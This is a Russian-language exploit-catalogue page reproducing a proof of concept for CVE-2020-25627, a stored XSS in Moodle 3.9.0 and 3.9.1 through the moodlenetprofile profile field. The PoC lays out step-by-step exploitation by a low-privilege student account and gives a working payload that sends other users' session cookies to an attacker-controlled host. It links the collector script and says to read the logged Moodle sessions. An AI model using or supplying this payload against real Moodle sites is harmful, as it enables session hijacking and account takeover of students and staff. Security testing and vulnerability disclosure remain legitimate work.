Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-25627 — Хранимая XSS через параметр moodlenetprofile в профиле пользователя | Kitploit
Инструменты/GitHubGitHub/hoangkien1020/cve-2020-25627
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

Хранимая XSS через параметр moodlenetprofile в профиле пользователя

Репозиторий
35 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-25627

Хранимый XSS через параметр moodlenetprofile в профиле пользователя

Мое PoC по этой CVE

Требования к пользователю: Студент (или сайт для регистрации)

XSS в moodlenetprofile

Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

moodlenetprofile parameter

Затронутые версии: 3.9.0 , 3.9.1

Источник

https://moodle.org/mod/forum/discuss.php?d=410839

Воздействие XSS (кража куки и т.д.), смотрите здесь:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Скачать инструмент